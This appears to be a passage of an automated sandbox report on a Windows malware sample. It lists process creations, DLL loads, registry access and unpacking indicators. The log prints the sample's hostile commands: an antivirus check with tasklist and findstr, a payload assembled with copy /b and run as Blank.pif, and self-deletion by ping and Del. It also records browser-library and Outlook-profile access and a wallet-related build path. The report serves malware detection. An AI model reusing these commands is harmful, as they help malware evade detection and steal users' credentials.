                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\AppData\LocalCGIDAAAKJJ.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Accepting Accepting.bat & Accepting.batJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 464151Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "DHappenedWestminsterUnexpected" Heat Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Theaters + ..\Keeping + ..\Estimate + ..\Tribute + ..\Nails + ..\Kingdom + ..\New + ..\Tears + ..\Zoo VJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Blank.pif VJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifProcess created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif C:\Users\user\AppData\Local\Temp\464151\Blank.pifJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifProcess created: C:\Users\user\AppData\Local\Temp\1248.tmp.exe "C:\Users\user\AppData\Local\Temp\1248.tmp.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe"
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\AppData\LocalCGIDAAAKJJ.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: mozglue.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: hlyG1m5UmO.exeStatic file information: File size 1162094 > 1048576
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: hlyG1m5UmO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: 1248.tmp.exe, 00000010.00000002.3373439337.000000006C1AD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.16.dr, mozglue.dll.16.dr
                    Source: Binary string: freebl3.pdb source: freebl3.dll.16.dr, freebl3[1].dll.16.dr
                    Source: Binary string: freebl3.pdbp source: freebl3.dll.16.dr, freebl3[1].dll.16.dr
                    Source: Binary string: nss3.pdb@ source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr
                    Source: Binary string: C:\Users\Administrator\Desktop\net8.0-windows7.0\Data\src\WalletsUpdater\WalletsUpdater\obj\Release\WalletsUpdater.pdb source: LocalCGIDAAAKJJ.exe, 0000002B.00000000.3327544133.0000000000812000.00000002.00000001.01000000.0000000E.sdmp, seed[1].exe.16.dr, LocalCGIDAAAKJJ.exe.16.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.16.dr, softokn3.dll.16.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr, vcruntime140[1].dll.16.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr, msvcp140[1].dll.16.dr
                    Source: Binary string: nss3.pdb source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr
                    Source: Binary string: mozglue.pdb source: 1248.tmp.exe, 00000010.00000002.3373439337.000000006C1AD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.16.dr, mozglue.dll.16.dr
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.16.dr, softokn3.dll.16.dr

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeUnpacked PE file: 16.2.1248.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.biwapeh:W;.tls:W;.mim:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeUnpacked PE file: 16.2.1248.tmp.exe.400000.0.unpack
                    Source: seed[1].exe.16.drStatic PE information: 0xF32C30E9 [Mon Apr 13 10:33:13 2099 UTC]
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                    Source: ScreenUpdateSync[1].exe.15.drStatic PE information: section name: .biwapeh
                    Source: ScreenUpdateSync[1].exe.15.drStatic PE information: section name: .mim
                    Source: 1248.tmp.exe.15.drStatic PE information: section name: .biwapeh
                    Source: 1248.tmp.exe.15.drStatic PE information: section name: .mim
                    Source: freebl3.dll.16.drStatic PE information: section name: .00cfg
                    Source: freebl3[1].dll.16.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.16.drStatic PE information: section name: .00cfg
                    Source: mozglue[1].dll.16.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.16.drStatic PE information: section name: .didat
                    Source: msvcp140[1].dll.16.drStatic PE information: section name: .didat
                    Source: nss3.dll.16.drStatic PE information: section name: .00cfg
                    Source: nss3[1].dll.16.drStatic PE information: section name: .00cfg
                    Source: softokn3.dll.16.drStatic PE information: section name: .00cfg
                    Source: softokn3[1].dll.16.drStatic PE information: section name: .00cfg
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00288B75 push ecx; ret 15_2_00288B88
